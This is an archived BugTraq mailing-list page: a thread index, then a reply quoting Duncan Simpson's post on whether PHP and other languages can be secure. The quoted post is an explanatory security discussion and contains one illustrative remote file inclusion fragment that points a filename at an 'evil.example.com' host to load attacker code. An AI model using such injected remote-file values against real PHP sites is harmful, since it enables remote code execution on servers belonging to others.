|
|
BugTraq
new linux malware Feb 18 2006 10:40PM Gadi Evron (ge linuxbox org) (2 replies) Re: new linux malware Feb 20 2006 04:57PM Christine Kronberg (Christine_Kronberg genua de) (1 replies) PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 20 2006 08:22PM Gadi Evron (ge linuxbox org) (2 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Dec 30 2006 10:00PM Kevin Waterson (kevin oceania net) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 05:53PM Bill Nash (billn billn net) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 09:00PM Tino Wildenhain (tino wildenhain de) (1 replies) RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 09:31PM Jim Harrison (Jim isatools org) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 10:37PM Dana Hudes (dhudes hudes org) (1 replies) RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 12:02AM Jim Harrison (Jim isatools org) (2 replies) Re: PHP as a secure language? PHP worms? Jan 02 2007 12:01PM Duncan Simpson (dps simpson demon co uk) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 10:58AM Darren Reed (avalon caligula anu edu au) (2 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 03:16PM Dana Hudes (dhudes hudes org) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 06:48PM Lawrence Paul MacIntyre (macintyrelp ornl gov) RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 02:15PM Jim Harrison (Jim isatools org) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 06:37PM Darren Reed (avalon caligula anu edu au) (3 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 03 2007 05:16AM Ronald Chmara (ron Opus1 COM) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 04 2007 08:59PM Jim Manico (jim manico net) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 09:07PM Bill Nash (billn billn net) RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 07:18PM Jim Harrison (Jim isatools org) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 22 2006 10:48AM Kevin Waterson (kevin oceania net) (2 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 24 2006 09:13PM Matthew Schiros (schiros gmail com) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 03:26PM L. Adrian Griffis (agriffis dstsystems com) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 03:50PM Matthew Schiros (schiros gmail com) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 04:21PM L. Adrian Griffis (agriffis dstsystems com) (1 replies) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 05:55PM Matthew Schiros (schiros gmail com) Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 24 2006 09:07PM Jamie Riden (jamie riden gmail com) Re: new linux malware Feb 20 2006 04:24PM Marco Monicelli (marco monicelli marcegaglia com) (1 replies) |
|
Privacy Statement |
By definition, such a language would prevent any insecure coding.
Simply making it difficult only increases the "security index" (new
rating system?); it does not make the language "secure".
-----Original Message-----
From: Duncan Simpson [mailto:dps (at) simpson.demon.co (dot) uk [email concealed]]
Sent: Tuesday, January 02, 2007 4:02 AM
To: Jim Harrison
Cc: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Re: PHP as a secure language? PHP worms?
Nobody has seen fit to point this out but there *are* secure languages.
In general these languages have limited feature sets or, at least in the
case of java, explicit sandbox features intended to stop bad things
happenning. Groups of monks competing for an abacus are probably unable
to read your password file, for example.
Some languages make particular vsorts of vulnerability easy to implement
and arguably this is a bad thing. Nobody would not be hit if they did
proper input validation but that requires real effort and is tedious to
implement.
PHP's URL as filename and register_globals features make several sorts
of abuse trivial.
I know the latter is off by default but lots of vulnerable scripts
require you to enable this feature.
C makes bofs and integer overflows easy to implement but fopen(3) lacks
magic features, so putting http://evil.example.com/evilcode? in front of
a filename gets the crackers nowhere. Arguably writing CGI applications
is harder too, so those that do have more clues.
perl is nice but you have to wacth out for strings containing nulls and
the magic features of perl's open function.
etc ad infinitum.
I am currently using C for my CGI programs but that is because several
large operations that get used a lot are a few thousands lines of C for
speed. My choice of CGI library also offers ZIP arhive expansion and
there are multiple instance where this is useful (the filenames in the
ZIP acrhive are ignored).
AFAIK there are no bof, integer overflow or SQL injection features yet
:-)
--
Duncan (-:
"software industry, the: unique industry where selling substandard goods
is legal and you can charge extra for fixing the problems."
--
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.
All mail to and from this domain is GFI-scanned.
[ reply ]